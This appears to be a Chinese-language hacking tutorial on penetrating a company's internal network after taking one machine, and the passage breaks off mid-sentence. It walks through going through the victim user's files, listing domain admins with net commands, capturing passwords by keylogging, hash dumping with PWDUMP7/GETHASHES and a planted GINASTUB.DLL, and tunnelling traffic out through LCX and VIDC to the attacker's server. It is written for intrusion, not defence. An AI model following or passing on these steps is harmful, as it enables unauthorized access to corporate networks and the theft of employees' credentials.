首先，我们会在什么情况下遇见内网?如果你的目标只局限于一个小WEB，那你完全不用考虑内网了。但是，如果你的目标是一个大WEB，或者一个大公司，那你就必须考虑内网的问题。 在我们的渗透过程中，很多大型网络的外部网站或是服务器不一定有用，当然外网也可以作为我们的一个突破口，毕竟没有经过尝试，我们也不知道里面的结构，至少在外部上我们可以获取一定的信息也说不定，但是对于内网，外网绝对不是我们的主要路径。很多时候我们直接从外网入手，想进入内网，已变得越来越困难。 那面对内网，我们应该怎样做呢?有些什么可利用的?或者有些什么方法?下面，我们就来一起讨论下。 渗透，本身就是一个信息收集，然后分类归档，技术利用，从而达到目标。 那我们拿到一个内网的机器时，我们首要要做的事情就是要进入信息的收集，什么信息?很多。。。 1.收集信息。 1-1.不论什么途径获得的内网机器，确定他在内网后，我们首先就要了解这台机器的所属人员，如果我们的目标是公司，那我们就要了解这个人在公司里的职位，他是个什么身份，有多大的权利，这都关系到他在内网里的权限。因为，作为大公司，一个高权限的人他在内网里所要用到的东西就多，那么相对他的机器，当然权限就会比一般普通员工的高很多，这在我的渗透过程中是常见的。 既然有了他的机器，那么翻翻他的电脑这是必要的，如果你说要怎么翻，你可以尝试熟悉他的电脑甚至比他本人还熟，那你就算了解详细了。一台个人用的电脑，从上面翻出与他自己相关的一些信息，和大量公司信息应该是没有问题的，除非，这是台新电脑。 1-2.了解了一定的人员信息，期间你要记下你所掌握到的账号，密码这些重要数据，以后有一定的用，所以，在你渗之前，不妨建个记事本将重要信息保存起来，写个记事本不会浪费你多少时间。接下来，我们就应该对这个网络进行一定的了解，他是一般的内网，还是域?一般大公司都会用域的，我们只需要查一下就知道，要想对他进行渗透，你就必须了解他的网络拓补，当然，一些太具体的物理上我们是无法了解的，我们只能了解我们所能知道的。不管他是INT，DMZ，LAN，我们必须足够掌握。在这，我们就会用到一定的命令，相信大家应该都很熟悉。 ipconfig/all查询一下本机的一些情况，IP段网关属于不属于域 netview查询一些存在联系的机器，一般以机器名显示，我们需要对其PING出IP，一是方便查询哪些重要机器的IP，二是方便查询存在几个段 netview/domain查询有几个域因为大型网络里面一般不止一个域的 netgroup/domain查询域里面的组 netu+ser/domain查询域用户 netgroup"domainadmins"/domain查询域管理用户组 这些都是我们需要了解的，当然有时候还会需要再查询一些信息，NET命令下你们都会找到，不需要我再重复，具体的情况具体分析问题。 2.信息归档 2-1。有了信息，我们就要对信息进行一定的归档，将每个机器名所对应的IP归档，方便用时不会乱。 2-2。查询出的用户，管理员，我们也必须归档。 2-3。查询信息时可能出现的有利用价值信息必须归档。 3.技术利用 3-1。不论是通过键盘记录。或者HASH的抓取，我们需要将账号，密码，邮箱，凡是涉及关键数据的全部保存，一方面是准备渗透的资料，二是防止当前利用机器会掉。 3-1-1。利用远控的键盘记录进行抓取。 3-1-2。利用PWDUMP7或者GETHASHES进行抓取HASH，然后HYPERLINK"http://donghua.77169.com/List/List_152.html"破解。GETHASHESV1.4后可以抓取域的全部HASH。 3-1-3。用GINASTUB.DLL获取管理员的账号和密码。因为域管理员有权限登陆任何一台机器。种上这个只是方便记录他所登陆的密码。INSTALL后，会在SYSYTEM32下生成一个FAXMODE.INC文件记录密码。 3-2。有了内网，很多东西我们是没有必要直接在当前利用机器上操作的，别人虽然是内网，但是不代表他没有防御系统，所以，我们建立SOCKS或者VPN是很有必要的，建立SOCKS相信大家都会了吧。 3-2-1。我在这推荐VIDC这个工具，很方便，在CMD下直接操VIDC.EXE-D-PPORT就可以了。 3-2-2。在利用机器上使用LCX，CMD下LCX.EXE-SLAVE服务器IPPORT127.0.0.1PORT，然后到服务器上CMD下LCX.EXE-LISTEN服务器IPPORT任意PORT。 3-2-3。建立SOCKS后在本地可以用SOCKSCAP来进行连接，成功连接后该操作什么就看你们自己了。 基本上我们就只能操作这么多了，后面已经没有什么技术上的再使用或利用，但是这中间的经验不少，所需要处理的细节也